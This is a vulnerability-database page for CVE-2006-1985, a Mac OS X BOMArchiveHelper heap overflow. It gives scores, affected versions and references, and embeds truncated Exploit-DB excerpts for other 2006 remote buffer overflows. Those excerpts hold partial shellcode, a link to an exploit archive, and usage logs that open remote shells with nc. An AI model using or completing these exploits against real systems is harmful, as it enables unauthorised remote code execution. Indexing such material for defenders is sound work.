CVE-2006-1985
published 2006-04-21CVE-2006-1985: Heap-based buffer overflow in BOM BOMArchiveHelper 10.4 (6.3) Build 312, as used in Mac OS X 10.4.6 and earlier, allows user-assisted attackers to execute…
PriorityP430medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
13.91%
96.1th percentile
Heap-based buffer overflow in BOM BOMArchiveHelper 10.4 (6.3) Build 312, as used in Mac OS X 10.4.6 and earlier, allows user-assisted attackers to execute arbitrary code via a crafted archive (such as ZIP) that contains long path names, which triggers an error in the BOMStackPop function.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
exploitdb·2006-09-20
CVE-2006-4974 Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
---
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:\>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\WS_FTP>
*/
#include
#define
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
exploitdb·2006-08-19
CVE-2006-3439 Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
---
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow
exploitdb·2006-04-20
CVE-2006-1985 Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow
Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow
---
source: https://www.securityfocus.com/bid/17634/info
Apple Mac OS X is reported prone to multiple security vulnerabilities.
These issue affect Mac OS X and various applications including Safari, Preview, Finder, QuickTime, and BOMArchiveHelper. A remote attacker may exploit these issues to execute arbitrary code and/or trigger a denial-of-service condition.
Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27715.zip
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2006/May/msg00003.htmlhttp://secunia.com/advisories/19686http://secunia.com/advisories/20077http://securitytracker.com/id?1016082http://www.osvdb.org/24819http://www.security-protocols.com/modules.php?name=News&file=article&sid=3233http://www.security-protocols.com/sp-x25-advisory.phphttp://www.securityfocus.com/bid/17634http://www.securityfocus.com/bid/17951http://www.us-cert.gov/cas/techalerts/TA06-132A.htmlhttp://www.vupen.com/english/advisories/2006/1452http://www.vupen.com/english/advisories/2006/1779https://exchange.xforce.ibmcloud.com/vulnerabilities/25945http://lists.apple.com/archives/security-announce/2006/May/msg00003.htmlhttp://secunia.com/advisories/19686http://secunia.com/advisories/20077http://securitytracker.com/id?1016082http://www.osvdb.org/24819http://www.security-protocols.com/modules.php?name=News&file=article&sid=3233http://www.security-protocols.com/sp-x25-advisory.phphttp://www.securityfocus.com/bid/17634http://www.securityfocus.com/bid/17951http://www.us-cert.gov/cas/techalerts/TA06-132A.htmlhttp://www.vupen.com/english/advisories/2006/1452http://www.vupen.com/english/advisories/2006/1779https://exchange.xforce.ibmcloud.com/vulnerabilities/25945
2006-04-21
Published